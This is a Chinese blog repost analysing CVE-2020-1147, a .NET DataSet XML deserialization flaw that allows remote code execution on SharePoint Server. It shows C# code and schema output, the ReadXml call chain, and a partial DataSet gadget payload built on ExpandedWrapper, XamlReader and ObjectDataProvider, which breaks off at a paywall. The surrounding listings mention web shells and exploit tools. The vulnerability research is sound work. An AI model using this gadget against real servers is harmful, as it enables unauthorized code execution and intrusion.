SharePoint和Pwn:针对SharePoint Server滥用DataSet的远程代码执行

最新推荐文章于 2021-01-31 12:53:47 发布
最新推荐文章于 2021-01-31 12:53:47 发布
阅读量789 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/systemino/article/details/108056844
版权

0x00 前言

7月,在CVE-2020-1147漏洞发布时,我很好奇这个漏洞的表现形式,以及如何利用这个漏洞实现远程代码执行。由于我对于SharePoint Server和.NET比较了解,因此决定深入研究一下。

在这篇文章中,我将详细分析CVE-2020-1147漏洞,该漏洞由Oleksandr Mirosh、Markus Wulftange和Jonathan Birch独立发现。我将分享如何针对SharePoint Server实例利用这一漏洞的详细信息,使用低特权用户的身份获得远程代码执行。需要特别说明的是,在这里我并没有提供完整的漏洞利用,因此如果大家遇到问题,需要独立解决。

我比较关注的一个点在于,Microsoft引用了与该漏洞相关的安全指南,具体如下:

如果传入的XML数据包含其类型不在列表中的对象,则会引发异常。反序列化操作将会失败。在将XML加载到现有的DataSet或DataTable实例中时,还应该考虑现有的列定义。如果表中已经包含自定义类型的列定义,那么在XML反序列化操作期间,该类型将被临时添加到允许列表中。

有趣的是,这里可以指定类型,并且可以覆盖列定义。奇热而这对我来说似乎很有帮助,让我们来看一下如何创建DataSet对象。

0x01 理解DataSet对象

在数据集DataSet中,包含数据表Datatable,其中包括数据列DataColumn和数据行DataRow。更重要的是,它实现了ISerializable接口,这意味着我们可以使用XmlSerializer对其进行序列化。首先,创建一个DataTable

        static void Main(string[] args)
        {
            // instantiate the table
            DataTable exptable = new DataTable("exp table");
                    
            // make a column and set type information and append to the table
            DataColumn dc = new DataColumn("ObjectDataProviderCol");
            dc.DataType = typeof(ObjectDataProvider);
            exptable.Columns.Add(dc);
                    
            // make a row and set an object instance and append to the table
            DataRow row = exptable.NewRow();
            row["ObjectDataProviderCol"] = new ObjectDataProvider();
            exptable.Rows.Add(row);
                    
            // dump the xml schema
            exptable.WriteXmlSchema("c:/poc-schema.xml");
        }

使用WriteXmlSchema方法,可以写出该模式的定义。这段代码会产生以下内容

< ?xml version="1.0" standalone="yes"? >< xs:schema id="NewDataSet" xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" >
  < xs:element name="NewDataSet" msdata:IsDataSet="true" msdata:MainDataTable="exp_x0020_table" msdata:UseCurrentLocale="true" >
    < xs:complexType >
      < xs:choice minOccurs="0" maxOccurs="unbounded" >
        < xs:element name="exp_x0020_table" >
          < xs:complexType >
            < xs:sequence >
              < xs:element name="ObjectDataProviderCol" msdata:DataType="System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" type="xs:anyType" minOccurs="0" / >
            < /xs:sequence >
          < /xs:complexType >
        < /xs:element >
      < /xs:choice >
    < /xs:complexType >
  < /xs:element >< /xs:schema >

在查看DataSet的代码后发现,它使用WriteXml和ReadXML公开了自己的序列化方法(包装在XmlSerializer上)

System.Data.DataSet.ReadXml(XmlReader reader, Boolean denyResolving)
  System.Data.DataSet.ReadXmlDiffgram(XmlReader reader)
    System.Data.XmlDataLoader.LoadData(XmlReader reader)
      System.Data.XmlDataLoader.LoadTable(DataTable table, Boolean isNested)
        System.Data.XmlDataLoader.LoadColumn(DataColumn column, Object[] foundColumns)
          System.Data.DataColumn.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
            System.Data.Common.ObjectStorage.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
              System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)

现在,剩下的步骤就是将表格添加到数据集中,并对其进行序列化

            DataSet ds = new DataSet("poc");
            ds.Tables.Add(exptable);
            using (var writer = new StringWriter())
            {
                ds.WriteXml(writer);
                Console.WriteLine(writer.ToString());
            }

这种序列化方式保留了模式类型,并在运行时使用实例化的XmlSerializer对象图中的单个DataSet预期类型来重建受到攻击者影响的类型。

0x02 DataSet Gadget

下面是可以构造的gadget示例,请注意,不要将它与ysoserial中的DataSet gadget混淆

< DataSet >
  < xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset" >
    < xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true" >
      < xs:complexType >
        < xs:choice minOccurs="0" maxOccurs="unbounded" >
          < xs:element name="Exp_x0020_Table" >
            < xs:complexType >
              < xs:sequence >
                < xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/ >
              < /xs:sequence >
            < /xs:complexType >
          < /xs:element >
        < /xs:choice >
      < /xs:complexType >
    < /xs:element >
  < /xs:schema >
  < diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1" >
    < 
最低0.47元/天 解锁文章
systemino
关注
在.NET中隐藏带有只读Web路径的Web shell
systemino的博客
10-27 495
在最近一次渗透测试中,我发现了一个容易受到CVE-2020-1147影响的SharePoint实例。我被要求在不运行任何命令的情况下构建Web Shell,以避免任何可能部署在主机上的EDR解决方案。由于目标SharePoint服务器以最小的特权在IUSR用户下运行,因此我们不能简单地通过利用反序列化漏洞(CVE-2020-1147)在Web目录中创建Web Shell。我记得以前在运行PowerShell命令时,攻击很容易被发现,所以需要更隐蔽的方法! 这篇文章说明了当我们存在代码执行漏洞但Web目录.
不能从远程创建com+对象_SharePoint Servert远程代码执行CVE20201147)分析
weixin_39725403的博客
11-24 8992
CVE-2020-1147 | .NET Framework,SharePoint Server和Visual Studio远程执行代码漏洞当该软件无法检查XML文件输入的源标记时,.NETFramework,MicrosoftSharePoint和VisualStudio中将存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在负责反序列化XML内容的过程的上下文中运行任意代码。...
比 Windows DNS 蠕虫漏洞更严重!SharePoint 反序列化RCE漏洞详情已发布,速修复
smellycat000的专栏
07-24 1462
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队安全研究员Steven Seeley发布文章,详细分析了CVE-2020-1147漏洞的根因以及低权限用户如何可在易...
[更新1.0: 分析报告发布]CVE-2020-1147: SharePoint等多个组件远程代码执行漏洞通告
爱国小白帽
07-22 1862
[更新1.0: 分析报告发布]CVE-2020-1147: SharePoint等多个组件远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 更新概览 2020年07月21日,360核心安全团队发布了针对SharePoint组件的分析报告,该报告表明远程攻击者可造成远程代码执行影响。本次更新标识该漏洞的详细信息公开,并可能在短时间内出现大规模攻击态势。 具体更新详情可参考: SharePoint and Pwn :: Remote Co
2020-07 补丁日: 微软多个产品高危漏洞安全风险通告
爱国小白帽
07-15 1040
360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 事件背景 2020年07月15日, 360CERT监测发现 微软官方 发布了 7月份 的安全更新,事件等级:严重。 此次安全更新发布了 123 个漏洞的补丁,主要涵盖了 Windows操作系统、商业版Skype、IE/Edge浏览器、ChakraCore、Visual Studio、.Net 框架、Azure DevOps、Office及Office服务和Web应用、微软恶意软件防护引擎。其中包括18个严重
browser-pwn:针对浏览器开发的资源的更新集合
02-25
有助于了解其架构和实施以及如何从源代码构建它们的信息 有助于查找其计算器弹出功能的信息 目录 引擎 开发 引擎 引擎概述 浏览资源 当然,您可以使用自己喜欢的设置来浏览源。 但是,这些存储库相对较大,因此我...
browser_pwn:浏览器pwn,现在主要工作
03-22
这些漏洞可能涉及内存管理错误(如堆溢出、栈溢出或类型混淆),或者是引擎解析和执行JavaScript代码时的逻辑错误。一旦找到这些漏洞,攻击者可以构造特定的JavaScript代码来触发漏洞,从而获取更高的权限,甚至实现...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 python struts-pwn.py --check --list 'urls.txt' ...
CVE-2020-17519 漏洞复现
weixin_43885355的博客
01-31 1329
CVE-2020-17519 0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01 漏洞概述 CVE-2020-17519 任意文件读取漏洞 Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。 该项更新允许攻击者通过JobManager进程的REST API读取JobManag
【检测工具】奇安信CVE-2020-0796快速扫描检测工具使用手册
安全解决方案
03-13 8322
奇安信 CVE-2020-0796 漏洞快速扫描检测工具是奇安信公司针对“Microsoft SMBv3 远程代码执行漏洞 CVE-2020-0796”推出的一款远程扫描工具。 一. 工具说明: 支持IP段批量扫描检测“CVE-2020-0796”漏洞功能。适合对局域网全网段扫描,以快速找到局域网内存在该漏洞的全部终端设备。 二、文件信息: 文件下载地址:http://dl.q...
CVE-2020-13671: Drupal 远程代码执行漏洞通告
爱国小白帽
11-19 1804
报告编号:B6-2020-111901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-11-19 0x01 漏洞简述 2020年11月19日,360CERT监测发现 Drupal 发布了 Drupal 代码执行漏洞 的风险通告,该漏洞编号为 CVE-2020-13671 ,漏洞等级:高危 ,漏洞评分:8.1 。 未授权的远程攻击者通过 上传特定文件名的文件 ,可造成 任意代码执行 。 对此,360CERT建议广大用户及时将 Drupal 升级到最新版本。与此同时,请做.
微软快速进行修复!SharePoint Server可让黑客执行任意程序代码的漏洞
weixin_34174422的博客
05-13 480
2019独角兽企业重金招聘Python工程师标准>>> ...
SharePoint and Pwn :: Remote Code Execution Against
爱国小白帽
07-22 2192
360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 Summary When CVE-2020-1147 was released last week I was curious as to how this vulnerability manifested and how an attacker might achieve remote code execution with it. Since I’m somewhat familar with Shar
[EXP]CVE-2019-0604 Microsoft SharePoint RCE Exploit
weixin_30660027的博客
06-26 3325
研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后,才发这现里的字全是都乱的。 剑桥大学的研究结果,当单词的字母顺序颠倒时,你仍旧可以明白整个单词的意思。其中重要的是:只要单词的第一个字母和最后一个子字母位置正确即可。其他的可以是完全的乱码,你仍旧可以清楚的完全没有问题的阅读。原因是因为人脑在认知单词的过程中不是依靠辨识字母的顺序,而是从整体来看。同理,汉字的阅读也会受到大脑先入为主的...
CVE-2020-1181: SharePoint 远程代码执行漏洞通告
爱国小白帽
06-23 1184
CVE-2020-1181: SharePoint 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 4天前 0x00 漏洞背景 2020年06月19日, 360CERT监测发现 Microsoft 官方 发布了 SharePoint远程代码执行漏洞 的风险通告,漏洞等级:中危。 SharePoint Portal Server 是一套门户网站解决方案,使得企业能够便捷地开发出智能的门户网站,能够无缝连接到用户、团队和知识。因此用户能够更好地利用业务
CTF PWN 远程payload
Bill
04-05 2771
最近在研究一些pwn类型的题.答案中经常出现一些python -c “XXX”|远端的程序.令我十分费解,经过我两个小时的研究,出了一些结果.给大家分享一下. 就拿pwnable.kr的一道题的答案举例:python -c “print (‘a’*96+’\x00\xa0\x04\x08’+’\n’+’134514147’)” | ./passcode. 首先这是linux的一条管道命令,前面的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值